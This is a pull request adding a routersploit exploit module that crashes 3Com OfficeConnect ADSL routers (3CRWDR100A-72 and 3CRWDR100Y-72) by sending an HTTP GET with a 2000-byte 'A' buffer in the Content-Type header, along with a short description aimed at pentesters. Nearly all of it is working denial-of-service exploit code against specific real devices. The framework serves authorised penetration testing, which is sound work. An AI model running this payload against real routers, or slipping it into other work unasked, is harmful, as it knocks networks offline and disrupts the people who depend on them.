### PR TITLE
Added exploit module officeconnect_dos_attack

### DIFF
--- a/routersploit/modules/exploits/3com/officeconnect_dos_attack.py
+++ b/routersploit/modules/exploits/3com/officeconnect_dos_attack.py
@@ -1,0 +1,49 @@
+import socket as sk
+
+from routersploit import (
+    exploits,
+    print_status,
+    print_error,
+    print_success
+
+)
+
+
+class Exploit(exploits.Exploit):
+
+    __info__ = {
+        'name': '3com Dos Attack',
+        'description': 'Dos attack Tested on 3Com OfficeConnect ADSL Wireless 11g'
+                       'Firewall Router 3CRWDR100A-72 and 3CRWDR100Y-72',
+        'authors': [
+            'Alberto Ortega',  # vulnerability discovery
+            'Leonardo Esparis <leo.leo.leoxnidas.c.14@gmail.com>'  # routersploit module
+        ],
+        'references': [
+            'https://www.exploit-db.com/exploits/10580/',
+        ],
+        'devices': [
+            '3Com OfficeConnect 3CRWDR100A-72',
+            '3Com OfficeConnect 3CRWDR100Y-72'
+        ],
+    }
+
+    target = exploits.Option('', 'ADSL Target address e.g. 192.168.1.1')
+    port = exploits.Option(80, 'Target port')
+
+    buffer = b'A' * 2000
+    socket = None
+
+    def run(self):
+        request = 'GET / HTTP/1.1\r\nContent-Type:{buffer}\r\n'.format(buffer=self.buffer)
+
+        try:
+            self.socket = sk.create_connection((self.target, self.port))
+        except sk.error as e:
+            print_error(str(e).rsplit(']')[-1].lstrip(' '))
+            return
+
+        print_status("Sending payload request")
+        self.socket.send(request)
+        self.socket.close()
+        print_success("Payload sended")


### PR DESCRIPTION
 it allow pentesters to exploit 3Com OfficeConnect ADSL Wireless 11g Firewall Router by http

buffer = 'A' * 2000
it send GET / HTTP/1.1\r\nContent-Type: buffer across http port and device crash.

vulnerable devices:
   3Com OfficeConnect 3CRWDR100A-72
   3Com OfficeConnect 3CRWDR100Y-72